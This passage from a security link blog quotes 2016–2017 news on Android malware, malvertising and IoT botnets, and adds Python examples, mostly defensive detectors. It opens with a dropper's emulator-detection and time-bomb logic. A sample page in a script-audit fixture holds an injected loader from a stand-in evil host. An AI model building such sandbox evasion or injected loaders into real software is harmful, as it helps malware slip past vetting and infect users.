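def payload_should_run(dev: DeviceSnapshot, now: datetime) -> bool:
    """The dropper's effective decision: no analysis artefacts AND the
    dormancy period has elapsed."""
    return not emulator_indicators(dev) and time_bomb_armed(dev, now)


# Constructed snapshots: a stock emulator running TaintDroid, and a handset.
EMULATOR = DeviceSnapshot(
    phone_number="15555215554",
    files={"/system/lib/libc_malloc_debug_qemu.so", "/sys/qemu_trace", "/system/bin/sh"},
    props={"ro.kernel.qemu": "1", "ro.hardware": "goldfish"},
    classes={"dalvik.system.Taint", "android.app.Activity"},
    installed_at=datetime(2017, 5, 1, 12, 0),
)
HANDSET = DeviceSnapshot(
    phone_number="447700900123",      # Ofcom's fictional range
    files={"/system/bin/sh"},
    props={"ro.kernel.qemu": "0", "ro.hardware": "msm8996"},
    classes={"android.app.Activity"},
    installed_at=datetime(2017, 5, 1, 12, 0),
)
CHECK_EARLY = datetime(2017, 5, 1, 12, 5)   # five minutes after install
CHECK_LATER = datetime(2017, 5, 3)          # two days after install

if __name__ == "__main__":
    print(emulator_indicators(EMULATOR))               # six indicators
    print(payload_should_run(EMULATOR, CHECK_LATER))   # False: sandbox spotted
    print(payload_should_run(HANDSET, CHECK_EARLY))    # False: time bomb not armed
    print(payload_should_run(HANDSET, CHECK_LATER))    # True
```

The point for a vetting pipeline is the conjunction: an emulator with every artefact scrubbed still sees nothing if it only runs the app for a few minutes, and a long-running analysis still sees nothing if a single `getprop` value gives it away.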
malware  android  emulation 
may 2017 by charlesarthur
Fixing your oven can cook your computer • The Register
Simon Sharwood:
<p>If your Hotpoint cooker or washer's on the blink, don't arrange a repair by visiting the manufacturer's website: the appliance vendor has been inadvertently foisting nastyware onto visitors.

As <a href="https://news.netcraft.com/archives/2017/04/17/hotpoint-service-sites-hacked.html">spotted by Netcraft</a>, fake Java update dialogs started appearing on Hotpoint's UK and Republic of Ireland sites this week. If you click “Install” you won't be updating Java, you'll be firing up obfuscated JavaScript that Hotpoint did not place on its site. That script tries to hide the fact it refers to a third-party site that can send a custom payload of malware your way.

That payload won't do nice things to your endpoint and may expose you to attacks like drive-by malware or phishing.

Netcraft says the source of the problem is almost certainly Hotpoint's WordPress installation, and notes that the content management system “is notorious for being compromised if both it and its plugins are not kept up to date.”</p>


Things you didn't have to worry about ten years ago.
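A small audit of the scripts a served page actually contains, of the kind you would run against a WordPress site after a report like this, as an added example for this page (it is not Netcraft's tooling). It flags script tags that load from hosts outside an allowlist and inline scripts that show crude obfuscation tells. The HTML, the hostnames and the allowlist are constructed; a real run would fetch the live page and compare against the scripts the site is supposed to ship:

```python
"""Added example: inventory of external and inline scripts in a page, with
an allowlist check and simple obfuscation heuristics.  Page and hosts are
constructed."""
import re
from html.parser import HTMLParser
from typing import List, Set, Tuple
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_script = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


# Crude tells, enough to surface an injected loader like the one described,
# not a classifier.
OBFUSCATION_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\bunescape\s*\("),
    re.compile(r"String\.fromCharCode"),
    re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),   # long runs of \xNN escapes
]

Finding = Tuple[str, str]   # ("external" | "inline", detail)


def audit_scripts(html: str, allowed_hosts: Set[str]) -> List[Finding]:
    """Flag <script src> pointing outside `allowed_hosts` and inline scripts
    matching an obfuscation pattern.  Relative URLs are same-origin and pass."""
    parser = ScriptCollector()
    parser.feed(html)
    findings: List[Finding] = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(("external", src))
    for body in parser.inline:
        if any(rx.search(body) for rx in OBFUSCATION_PATTERNS):
            findings.append(("inline", body.strip()[:60]))
    return findings


# Constructed page: two legitimate scripts, one benign inline script, then an
# injected external loader and an injected obfuscated inline script.
SAMPLE_PAGE = """
<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.example.com/site.js"></script>
<script>var siteReady = true;</script>
<script src="https://java-update.evil.invalid/loader.js"></script>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74"));</script>
</head><body></body></html>
"""
ALLOWED_HOSTS = {"cdn.example.com"}

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(kind, detail)
```

Run it on a snapshot taken with the same user agent and from the same kind of network a visitor would use: injected loaders of this sort are often served conditionally, so a fetch from a known scanner IP can come back clean.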
hotpoint  wordpress  malware 
april 2017 by charlesarthur
Forget Mirai – Brickerbot malware will kill your crap IoT devices • The Register
Iain Thomson:
<p>A new form of attack code has come to town and it uses techniques similar to Mirai to permanently scramble Internet of Things devices.

On March 20 researchers at security shop Radware spotted the malware, dubbed Brickerbot, cropping up in honeypots it sets up across the web to lure interesting samples. In the space of four days, one honeypot logged 1,895 infection attempts by Brickerbot, with the majority of attacks coming from Argentina, and a second logged 333 attempts – untraceable as they came from a Tor node.

"The Bricker Bot attack used Telnet brute force – the same exploit vector used by Mirai – to breach a victim's devices," <a href="https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/">Radware's advisory</a> states.

"Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently 'root'/'vizxv.'"</p>


There's a suggestion that it's trying to brick devices before they can become part of a botnet. Seems like burning the village to save it if so.
malware  iot  security 
april 2017 by charlesarthur
If you download Minecraft mods from Google Play, read on … • We Live Security
Lukas Stefanko:
<p>When launched, the apps immediately request device administrator rights. Once device administrator is activated, a screen with an “INSTALL MOD” button is displayed. Simultaneously, a push notification informs the user that a “special Block Launcher” is needed in order to proceed with the installation.

After clicking the “INSTALL MOD” button, the user is prompted to install the additional module “Block Launcher Pro”, granting it several intrusive permissions (including device administrator rights) in the process. The payload downloaded during the installation is detected by ESET as Android/Hiddad.DA.

Installing the module brings the user to a dead end – a static Minecraft-themed screen with no clickable elements. The only actual function of the app and its module is to display ads – which now show up on the user’s device, interrupting their activity.

Interestingly, this ad-displaying downloader is an evolved version of an app that was originally uploaded to Google Play in February. The original version used a similar interface and also demanded device administrator rights. However, it didn’t have any downloading functionality and, unlike the downloader analyzed in this article, the first version actually provided the user with real Minecraft mods.

Since the result of this evolution – a downloader – is able to download any sort of additional malware to the victim’s device, there is no reason to believe malware authors would stop at only displaying unwanted ads.</p>


Got to nearly a million installs before they spotted it and reported it. Clearly, Google's proactive PHA (potentially harmful apps) program isn't quite perfect when it comes to this stuff.
minecraft  android  malware 
march 2017 by charlesarthur
Diverse protections for a diverse ecosystem: Android Security 2016 Year in Review • Official Google blog
Mel Miller, Android security program manager, introducing the overview:
<p>Security updates are regularly highlighted as a pillar of mobile security—and rightly so. We launched our monthly security updates program in 2015, following the public disclosure of a bug in Stagefright, to help accelerate patching security vulnerabilities across devices from many different device makers. This program expanded significantly in 2016:

• More than 735m devices from 200+ manufacturers received a platform security update in 2016.
• We released monthly Android security updates throughout the year for devices running Android 4.4.4 and up—that accounts for 86.3% of all active Android devices worldwide.
• Our carrier and hardware partners helped expand deployment of these updates, releasing updates for over half of the top 50 devices worldwide in the last quarter of 2016.

We provided monthly security updates for all supported Pixel and Nexus devices throughout 2016, and we’re thrilled to see our partners invest significantly in regular updates as well. There’s still a lot of room for improvement however. About half of devices in use at the end of 2016 had not received a platform security update in the previous year.</p>


Take the first bullet point together with the final sentence, and you get a figure of about 1.4bn-1.5bn Google Android devices in use at the end of 2016. (That doesn't include China, of course, where it's AOSP Android without Google services.)

Sideloading meanwhile remains the risk for malware:
<p>there’s more work to do for devices overall, especially those that install apps from multiple sources. While only 0.71% of all Android devices had PHAs installed at the end of 2016, that was a slight increase from about 0.5% in the beginning of 2015. Using improved tools and the knowledge we gained in 2016, we think we can reduce the number of devices affected by PHAs in 2017, no matter where people get their apps.</p>


I'd love to know the reason behind that increase. It suggests about 10m infected devices outside China.
android  security  malware 
march 2017 by charlesarthur
Detecting and eliminating Chamois, a fraud botnet on Android • Android Developers Blog
Bernhard Grill, Megan Ruthven, and Xin Zhao (security software engineers):
<p>Chamois is an Android PHA [malware - "potentially harmful application"] family capable of:

• Generating invalid traffic through ad pop ups having deceptive graphics inside the ad
• Performing artificial app promotion by automatically installing apps in the background
• Performing telephony fraud by sending premium text messages
• Downloading and executing additional plugins
• Interference with the ads ecosystem

We detected Chamois during a routine ad traffic quality evaluation. We analyzed malicious apps based on Chamois, and found that they employed several methods to avoid detection and tried to trick users into clicking ads by displaying deceptive graphics. This sometimes resulted in downloading of other apps that commit SMS fraud. So we blocked the Chamois app family using Verify Apps and also kicked out bad actors who were trying to game our ad systems.

Our previous experience with ad fraud apps like this one enabled our teams to swiftly take action to protect both our advertisers and Android users. Because the malicious app didn't appear in the device's app list, most users wouldn't have seen or known to uninstall the unwanted app. This is why Google's Verify Apps is so valuable, as it helps users discover PHAs and delete them.

Chamois was one of the largest PHA families seen on Android to date and distributed through multiple channels. To the best of our knowledge Google is the first to publicly identify and track Chamois.</p>


Notable what Google isn't saying: how many apps had this; how many developers were involved; how many downloads there had been (of apps which contained this malware); how long it had been going on; how many people have been affected.

One other note:
<p>"Our security teams sifted through more than 100K lines of sophisticated code written by seemingly professional developers. Due to the sheer size of the APK, it took some time to understand Chamois in detail."</p>


"Seemingly professional"? Anyone who writes that amount of code isn't doing it for laughs, and if they evaded Google for as long as they clearly did, they're at least "professional".
android  malware 
march 2017 by charlesarthur
Apple deleted server supplier after finding infected firmware in servers [Updated] • Ars Technica
Sean Gallagher, first repeating and then updating <a href="https://www.theinformation.com/apple-severed-ties-with-server-supplier-after-security-concern?shared=516084">a story from The Information</a> about Apple dumping SuperMicro Systems over dodgy firmware:
<p>Apple has used a variety of other companies' server hardware—since the company got out of the server business itself and never used its own in datacenters—including servers from HP and storage from NetApp. A few years ago, Apple added Supermicro as a supplier for some of its development and data center computing infrastructure.

But Apple has been squeezing the cost of its data center supply chain and moving toward more custom hardware much like the other cloud giants. In August of 2016, Digitimes reported Apple was increasing its orders for full-rack systems from the integrator ZT Systems and adding the China-based Inspur as a server supplier.

Leng told The Information that Apple was the only company to report the firmware issue, and he said the servers are used by thousands of customers. He asserted that when his company asked Apple's engineers to provide information about the firmware, they gave an incorrect version number—and then refused to give further information.

Update: A source familiar with the case at Apple told Ars that the compromised firmware affected servers in Apple's design lab, and not active Siri servers. The firmware, according to the source, was downloaded directly from Supermicro's support site—and that firmware is still hosted there.</p>


Wonder how the infection was spotted. Did it phone home?
apple  supermicro  firmware  malware 
march 2017 by charlesarthur
New Mac malware pinned on same Russian group blamed for election hacks • Ars Technica
Dan Goodin:
<p>APT28, the Russian hacking group tied to last year's interference in the 2016 presidential election, has long been known for its advanced arsenal of tools for penetrating Windows, iOS, Android, and Linux devices. Now, researchers have uncovered an equally sophisticated malware package the group used to compromise Macs.

Like its counterparts for other platforms, the Mac version of Xagent is a modular backdoor that can be customized to meet the objectives of a given intrusion, researchers from antivirus provider Bitdefender reported in a blog post published Tuesday. Capabilities include logging passwords, snapping pictures of screen displays, and stealing iOS backups stored on the compromised Mac.

The discovery builds on the already considerable number of tools attributed to APT28, which other researchers call Sofacy, Sednit, Fancy Bear, and Pawn Storm. According to researchers at CrowdStrike and other security firms, APT28 has been operating since at least 2007 and is closely tied to the Russian government. An analysis Bitdefender published last year determined APT28 members spoke Russian, worked mostly during Russian business hours, and pursued targets located in Ukraine, Spain, Russia, Romania, the US, and Canada.</p>
malware  macos 
february 2017 by charlesarthur
Google claims ‘massive’ Stagefright Android bug had 'sod all effect' • The Register
Iain Thomson:
<p>Despite shrill wailings by computer security experts over vulnerabilities in Android, Google claims very, very few people have ever suffered at the hands of its bugs.

Speaking at the RSA security conference in San Francisco on Tuesday, Adrian Ludwig, director of Android security, said the Stagefright hole – which prompted the Chocolate Factory to start emitting low-level security patches on a monthly basis – did put 95% of Android devices at risk of attack. However, there have been no “confirmed” cases of infections via the bug, Ludwig claimed.

It was a similar story for the MasterKey vulnerability that was spotted in 2013, he said. In that case, 99% of Android devices were vulnerable, but exploits abusing the security blunder peaked at less than eight infections per million users, it was claimed. And there were no exploits for the hole before details of the flaw were made public.

He also cited the 2014 FakeID flaw, disclosed at Black Hat that year. This affected 82% of Android users but exploits peaked at one infection per million users after the details were released, and none before that, we're told.

Ludwig said he was sure of his figures, due to malware-detection routines, dubbed Verify Apps, in Google Play services, which is installed on more than 1.4 billion Android handhelds. Verify Apps reports back to Google when a software nasty is spotted on the device, allowing the web giant to tot up infection tallies.</p>


Well, OK, but Stagefright could be exploited by picture message, and then hacked the OS. Verify Apps wouldn't see it. And given the extraordinarily broad permissions that the average Android app demands, and is granted, why bother with malware?
android  malware 
february 2017 by charlesarthur
University attacked by its own vending machines, smart light bulbs & 5,000 IoT devices • Network World
"Ms Smith":
<p>Today’s cautionary tale comes from Verizon’s sneak peek (pdf) of the 2017 Data Breach Digest scenario. It involves an unnamed university, seafood searches, and an IoT botnet; hackers used the university’s own vending machines and other IoT devices to attack the university’s network.

Since the university’s help desk had previously blown off student complaints about slow or inaccessible network connectivity, it was a mess by the time a senior member of the IT security team was notified. The incident is given from that team member’s perspective; he or she suspected something fishy after detecting a sudden big interest in seafood-related domains.

The “incident commander” noticed “the name servers, responsible for Domain Name Service (DNS) lookups, were producing high-volume alerts and showed an abnormal number of sub-domains related to seafood. As the servers struggled to keep up, legitimate lookups were being dropped—preventing access to the majority of the internet.” That explained the “slow network” issues, but not much else.

The university then contacted the Verizon RISK (Research, Investigations, Solutions and Knowledge) Team and handed over DNS and firewall logs. The RISK team discovered the university’s hijacked vending machines and 5,000 other IoT devices were making seafood-related DNS requests every 15 minutes.</p>
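The detection the story implies, as an added example for this page (it is not the Verizon RISK team's tooling): group DNS queries by client and by the domain under the TLD, then alert where one client resolves many distinct subdomains of one domain at a fixed cadence. The log format, the domain names, the 15-minute period and the thresholds are all assumptions, and the log lines are constructed:

```python
"""Added example: periodic high-cardinality DNS lookups per client, over a
constructed query log."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median
from typing import Dict, List, Tuple

# Constructed log: two infected clients beacon every 15 minutes to fresh
# subdomains; 192.0.2.50 is a normal client.
SAMPLE_DNS_LOG = """\
2017-02-13T12:00:02Z 192.0.2.10 lobster.seafood-example.test
2017-02-13T12:00:05Z 192.0.2.11 shrimp.seafood-example.test
2017-02-13T12:03:10Z 192.0.2.50 www.example.com
2017-02-13T12:15:01Z 192.0.2.10 scallop.seafood-example.test
2017-02-13T12:15:04Z 192.0.2.11 oyster.seafood-example.test
2017-02-13T12:30:03Z 192.0.2.10 halibut.seafood-example.test
2017-02-13T12:30:06Z 192.0.2.11 clam.seafood-example.test
2017-02-13T12:41:00Z 192.0.2.50 www.example.com
"""

Record = Tuple[datetime, str, str]   # (timestamp, client, query name)


def parse_log(text: str) -> List[Record]:
    records: List[Record] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname = line.split()
        records.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        client, qname.lower().rstrip(".")))
    return records


def registered_domain(qname: str) -> str:
    """Naive 'domain under the TLD': the last two labels.  Real code should
    use the Public Suffix List (co.uk etc.); this is an assumption here."""
    return ".".join(qname.split(".")[-2:])


def find_beacons(records: List[Record], min_subdomains: int = 3,
                 period: timedelta = timedelta(minutes=15),
                 tolerance: timedelta = timedelta(minutes=1)):
    """Per (client, domain): at least `min_subdomains` distinct names AND all
    gaps between queries within `tolerance` of `period`.
    Returns (client, domain, distinct_subdomains, median_gap_seconds)."""
    groups: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, client, qname in records:
        groups[(client, registered_domain(qname))].append((ts, qname))
    alerts = []
    for (client, domain), events in groups.items():
        names = {q for _, q in events}
        if len(names) < min_subdomains:
            continue
        times = sorted(t for t, _ in events)
        gaps = [b - a for a, b in zip(times, times[1:])]
        if gaps and all(abs(g - period) <= tolerance for g in gaps):
            alerts.append((client, domain, len(names),
                           median(g.total_seconds() for g in gaps)))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in find_beacons(parse_log(SAMPLE_DNS_LOG)):
        print(alert)   # ('192.0.2.10', 'seafood-example.test', 3, 900.5) ...
```

Two practical points the story illustrates: the resolver logs are enough to find this even when the devices themselves cannot be inspected, and the first symptom was resolver overload, so the same query volume that makes the beacons easy to spot is what took the network down.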
iot  hacking  malware 
february 2017 by charlesarthur
Neuroscience explains why we get hacked so easily • MIT Technology Review
Tom Simonite:
<p>Multitasking is partly to blame. [Associate professor at Brigham Young University Anthony] Vance’s collaboration with Google grew out of experiments that showed when people reacted to security warnings while also performing another task, brain activity in areas associated with fully engaging with a warning was significantly reduced. People were three times less likely to correctly interpret a message when they reacted to security warnings while also performing another task.

Vance’s lab teamed up with Google to test a version of [its browser] Chrome modified to deliver warnings about a person’s computer possibly being infected by malware or adware only when they weren’t deeply engaged in something. For example, it would wait until someone finished watching a video, or was waiting for a file to download or upload, to pop up the message.

<a href="http://pubsonline.informs.org/doi/pdf/10.1287/isre.2016.0644">Testing showed</a> that people using the interruption-sensitive version of Chrome ignored the message only about a third of the time, compared to about 80 percent of the time without it.

Other studies in Vance’s lab have shown that people very rapidly become habituated to security warnings—he’s shown how the brain’s response to a message drops significantly even on just the second time someone sees it.

The researchers also did follow-up experiments in which people were asked to download mobile apps that asked for alarming permissions (for example, “Can delete your photos”). By breaking the usual rules of software design and having the security-related messages change in appearance slightly each time—for example, with different colors—it was possible to reduce the habituation effect.</p>
neuroscience  google  security  malware 
february 2017 by charlesarthur
VPN on Android means 'voyeuristic peeper network' in many cases • The Register
<p>A worrying number of VPN apps for Android mobile devices are rife with malware, spying, and code injection, say researchers.

A <a href="http://www.icir.org/vern/papers/vpn-apps-imc16.pdf">study</a> [PDF] from the University of New South Wales in Australia and the University of California at Berkeley found that Android apps advertising themselves as VPN clients often contain poor security protections, and in some cases engage in outright malicious activities.

"Many apps may legitimately use the VPN permission to offer (some form of) online anonymity or to enable access to censored content," the researchers write. "However, malicious app developers may abuse it to harvest users' personal information."

That sort of malicious activity is shockingly common, the researchers found. They studied the activity of 283 VPN apps on the Google Play store and catalogued the various risky and malicious activities they found:

• 82% of the VPN apps requested permission to access sensitive data on the device, such as SMS history
• 38% of the apps contained some form of malware
• 16% routed traffic through other devices, rather than a host server
• 16% use in-path proxies to modify HTML traffic in transit
• Three of the 283 analysed apps specifically intercept bank, messaging, and social network traffic.</p>


That's not good. (It's because it can break app sandboxing on Android; not sure whether this applies to iOS.)
android  vpn  malware 
january 2017 by charlesarthur
Silence speaks louder than words when finding malware • Android Developers Blog
Megan Ruthven, software engineer:
<p>One security solution included on all devices with Google Play is <a href="https://support.google.com/accounts/answer/2812853?hl=en">Verify apps</a>. Verify apps checks if there are Potentially Harmful Apps (PHAs) on your device. If a PHA is found, Verify apps warns the user and enables them to uninstall the app.

But, sometimes devices stop checking up with Verify apps. This may happen for a non-security related reason, like buying a new phone, or, it could mean something more concerning is going on. When a device stops checking up with Verify apps, it is considered Dead or Insecure (DOI). An app with a high enough percentage of DOI devices downloading it is considered a DOI app. We use the DOI metric, along with the other security systems to help determine if an app is a PHA to protect Android users. Additionally, when we discover vulnerabilities, we patch Android devices with our <a href="https://source.android.com/security/bulletin/">security update system</a>…

…A device is considered retained if it continues to perform periodic Verify apps security check ups after an app download. If it doesn't, it's considered potentially dead or insecure (DOI). An app's retention rate is the percentage of all retained devices that downloaded the app in one day. Because retention is a strong indicator of device health, we work to maximize the ecosystem's retention rate.

Therefore, we use an app DOI scorer, which assumes that all apps should have a similar device retention rate. If an app's retention rate is a couple of standard deviations lower than average, the DOI scorer flags it…

…the DOI score flagged many apps in three well known malware families — Hummingbad, Ghost Push, and Gooligan. Although they behave differently, the DOI scorer flagged over 25,000 apps in these three families of malware because they can degrade the Android experience to such an extent that a non-negligible amount of users factory reset or abandon their devices.</p>


Nice. But tell me more about this thing where "we patch Android devices with our security update system." I don't think you actually do that. The OEMs do, if people are lucky.
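The retention-based DOI scorer as the post describes it, as an added example for this page (it is not Google's code). It computes each app's retention rate, the ecosystem mean and standard deviation, and flags apps that sit a couple of standard deviations below the mean. The per-app counts are constructed; the two-standard-deviation threshold and the minimum-download cut-off are assumptions, since the post only says "a couple of standard deviations":

```python
"""Added example: retention-rate outlier scoring over constructed counts."""
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# app -> (devices that downloaded it on the day, devices still checking in
# with Verify Apps afterwards).  Constructed numbers.
SAMPLE_APPS: Dict[str, Tuple[int, int]] = {
    "notes": (1000, 990),
    "weather": (2000, 1970),
    "torch": (500, 495),
    "calc": (1000, 980),
    "reader": (1500, 1485),
    "music": (800, 792),
    "mod-installer": (1000, 800),   # devices go quiet after installing it
    "tiny": (50, 10),               # too few downloads to score
}


def retention_rates(apps: Dict[str, Tuple[int, int]],
                    min_downloads: int = 100) -> Dict[str, float]:
    """retained devices / downloading devices, for apps with enough downloads
    that a handful of odd devices cannot dominate the rate."""
    return {name: retained / downloads
            for name, (downloads, retained) in apps.items()
            if downloads >= min_downloads}


def flag_doi_apps(apps: Dict[str, Tuple[int, int]], threshold_sd: float = 2.0,
                  min_downloads: int = 100) -> List[Tuple[str, float, float]]:
    """Flag apps whose retention rate is `threshold_sd` or more standard
    deviations below the ecosystem average.  Returns (app, rate, z-score)."""
    rates = retention_rates(apps, min_downloads)
    mu = mean(rates.values())
    sd = pstdev(rates.values())
    flagged = []
    for name, rate in rates.items():
        z = (rate - mu) / sd if sd else 0.0
        if z <= -threshold_sd:
            flagged.append((name, rate, round(z, 2)))
    return sorted(flagged)


if __name__ == "__main__":
    for name, rate, z in flag_doi_apps(SAMPLE_APPS):
        print(f"{name}: retention {rate:.1%}, z={z}")
```

With eight apps the one outlier inflates the standard deviation it is measured against, which is why it only scores about -2.4 here; over an ecosystem of thousands of apps that effect disappears, and a robust baseline (median and MAD) is the obvious next step. Note also what the signal cannot tell apart: an app that bricks or persuades users to factory-reset, and an app whose users simply switch phones that day.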
security  android  malware 
january 2017 by charlesarthur
Did you download a Super Mario Run APK for Android? That's malware • VentureBeat
Jeff Grubb:
<p>Often before a new mobile game comes out, people who use an Android smartphone or tablet can get the game early by scouring the internet for Android install files known as APKs. These are like .exe files on Windows, and they enable you to install software on your device without having to go through the Google Play Store.

Naturally, with Nintendo launching Super Mario Run exclusively for iOS systems yesterday, Android owners are desperate to play the game. Since it’s not on Google Play, some folks are searching forums and APK databases for the Nintendo platformer. If you do this, what you will find instead are viruses and other malicious pieces of software attempting to look like Super Mario Run.

Super Mario Run, you see, doesn’t have an APK for Android yet.

Many shady websites, like KO Player, are already hosting files that they claim are an APK for Super Mario Run that will enable you to play the game on a Samsung Galaxy, an LG V20, or a Google Pixel. But the reality is that these are almost always viruses of some sort.</p>
supermario  malware 
december 2016 by charlesarthur
Adgholas malvertising: business as usual • Malwarebytes blog
Jérôme Segura:
<p>In October, there was the first instance of AdGholas going through Yahoo’s ad network to deliver their malicious ad. This one was delivered within the Yahoo mail interface (users checking their mail would be shown the rogue advert).

It was not until much later (11/27) that we were finally able to reproduce the malvertising chain from a genuine residential IP address with a machine clean of any monitoring tools, only capturing traffic transparently. Up until then, we only had very strong suspicions that something was going on, but without a network capture, we simply did not possess the ‘smoking gun’ required to make an affirmative claim. As soon as we had evidence of malfeasance (November 27th), we informed Yahoo of our discovery.

It was quite revealing that only a few days (11/30) after our report to Yahoo, we saw AdGholas switch to another domain on the very same server (broxu[.]com) being used with the exact same tricks.

Large publishers such as the MSN network were once again serving malware.</p>

I wonder how you could hack millions of email accounts belonging to a company that served adverts with its email. (Related question: how good are Google's defences against same for its majority of users who don't use two-factor authentication?)
Yahoo  malware  malvertising 
december 2016 by charlesarthur
Holy crap did I get the most annoying trojan attempt ever! • SuperGlobalMegaCorp
"Neozeed":
<p>Sit down kids, it’s time for an old man rant.

So yeah, I have one of those clients who wants to use ‘one of those’ file sharing sites. UGH.  I swear I’m to the point of just paying for an Office 365 subscription for them so I don’t have to deal with this kind of shit.  So I hit the site on my phone, then it jumps to this genchatu.top site.  Fantastic.

Then I’m alerted that my phone is 28.1% DAMAGED, and somehow my phone’s SIM card will be damaged!  Yes, it’s one of these scam sites!

<img src="https://virtuallyfun.superglobalmegacorp.com/wordpress/wp-content/uploads/2016/12/超级截屏_20161207_001143.png" width="50%" />

Oh no, my phone apparently may be already physically damaged?  I guess this is once someone is tricked by this official Google looking image you’ll want to throw your phone against the wall.  As any user of Android will tell you updates from Google are non existent, and anything that could infect your phone, well is pretty much your problem.  You can beg the vendor, but lol, good luck.

I like to live dangerously, so yeah let’s look at the app.

<img src="https://virtuallyfun.superglobalmegacorp.com/wordpress/wp-content/uploads/2016/12/超级截屏_20161207_001227.png" width="50%" />


So with this scary and official looking thing it’s trying to railroad you into “Ace Cleaner”. I don’t know how on earth they haven’t either been reported, or knocked out of the app store. I guess Google is busy teaming up with Facebook trying to figure out how to censor the news appropriately instead of trying to squash actual scam artists.</p>


But as the reviews imply, these scams work. People download this stuff and it sits on their machines, and they probably don't realise it's watching everything they do.
malware  android 
december 2016 by charlesarthur
Millions exposed to malvertising that hid attack code in banner pixels • Ars Technica UK
Dan Goodin:
<p>Researchers from antivirus provider Eset said "Stegano," as they've dubbed the campaign, dates back to 2014. Beginning in early October, its unusually stealthy operators scored a major coup by getting the ads displayed on a variety of unnamed reputable news sites, each with millions of daily visitors. Borrowing from the word steganography—the practice of concealing secret messages inside a larger document that dates back to at least 440 BC—Stegano hides parts of its malicious code in parameters controlling the transparency of pixels used to display banner ads. While the attack code alters the tone or color of the images, the changes are almost invisible to the untrained eye.

The malicious script is concealed in the alpha channel that defines the transparency of pixels, making it extremely difficult for even sharp-eyed ad networks to detect. After verifying that the targeted browser isn't running in a virtual machine or connected to other types of security software often used to detect attacks, the script redirects the browser to a site that hosts three exploits for now-patched Adobe Flash vulnerabilities.</p>


Flash plus ad networks: it's a recipe for disaster.
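The Eset report quoted above describes code carried in the alpha (transparency) channel of banner pixels, invisible to a viewer. One screening check an ad network or publisher can run on creatives is to look at the alpha channel itself: an opaque banner should have a constant alpha of 255, so many "almost opaque" values with high-entropy low bits are a signal worth a second look. The block below is an added example written for this page, not Eset's detection logic or any ad network's code; the pixel data is constructed inline (a clean banner and a banner whose alpha values wobble by one unit) and the thresholds are assumptions to tune against real creatives.

```python
"""Alpha-channel screening heuristic for banner images (added example, constructed data)."""
import math


def alpha_channel(pixels):
    """pixels: sequence of (r, g, b, a) tuples with components in 0..255."""
    return [p[3] for p in pixels]


def bit_entropy(bits):
    """Shannon entropy (in bits) of a sequence of 0/1 values; 0.0 for an empty or constant sequence."""
    n = len(bits)
    if n == 0:
        return 0.0
    ones = sum(bits)
    h = 0.0
    for count in (ones, n - ones):
        if count:
            p = count / n
            h -= p * math.log2(p)
    return h


def inspect_alpha(pixels, near_opaque_max_share=0.01, lsb_entropy_threshold=0.9):
    """Return alpha-channel statistics and a 'suspicious' flag.

    Heuristic (assumed thresholds): a banner meant to be fully opaque that has
    more than 1% of pixels at alpha 240..254 (invisible to the eye) AND whose
    alpha least-significant bits look random is flagged for manual review.
    """
    alphas = alpha_channel(pixels)
    n = len(alphas)
    near_opaque = sum(1 for a in alphas if 240 <= a <= 254)
    share = near_opaque / n if n else 0.0
    lsb_entropy = bit_entropy([a & 1 for a in alphas])
    return {
        "pixels": n,
        "distinct_alpha_values": len(set(alphas)),
        "near_opaque_share": share,
        "alpha_lsb_entropy": lsb_entropy,
        "suspicious": share > near_opaque_max_share and lsb_entropy > lsb_entropy_threshold,
    }


def make_banner(width, height, alpha_fn):
    """Construct a flat red banner whose alpha is chosen per pixel index by alpha_fn."""
    return [(200, 30, 30, alpha_fn(i)) for i in range(width * height)]


# Constructed fixtures: a normal opaque banner, and one whose alpha flips
# between 255 and 254 on alternate pixels (invisible when rendered).
CLEAN_BANNER = make_banner(64, 16, lambda i: 255)
NOISY_BANNER = make_banner(64, 16, lambda i: 255 - (i % 2))

if __name__ == "__main__":
    for name, banner in (("clean", CLEAN_BANNER), ("noisy", NOISY_BANNER)):
        print(name, inspect_alpha(banner))
```

Images with legitimate soft edges, drop shadows or gradients also vary their alpha, so this is a triage signal to route a creative for closer inspection (for instance, in a sandboxed renderer), not a verdict on its own.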
malvertising  malware  flash 
december 2016 by charlesarthur
Routers behaving badly • net.wars
Wendy Grossman:
<p>Late on Saturday night, a small laptop started having trouble connecting. This particular laptop sometimes has these issues, which I put down to the peculiarities of running wired ethernet into it via a USB converter. But the next day I realized that the desktop was timing out on some connections, and one of the other laptops was refusing to connect to the internet at all. An unhappy switch somewhere in the middle? Or perhaps a damaged cable? The wireless part of the network, which I turned on as a test, worked much better, which lent credence to the cable idea.

By Monday morning, I had concluded the thing to do was to restart the main router. Things were fine after that. On Tuesday morning, some bounced emails from my server alerted me to the fact that my IP address had been placed on one of the three blacklists Spamhaus consults. It was only then that I realized my router was one of the ones affected by <a href="http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/">the 7547 bug</a>. If my network had been spewing botnet messages, the router was infected.</p>

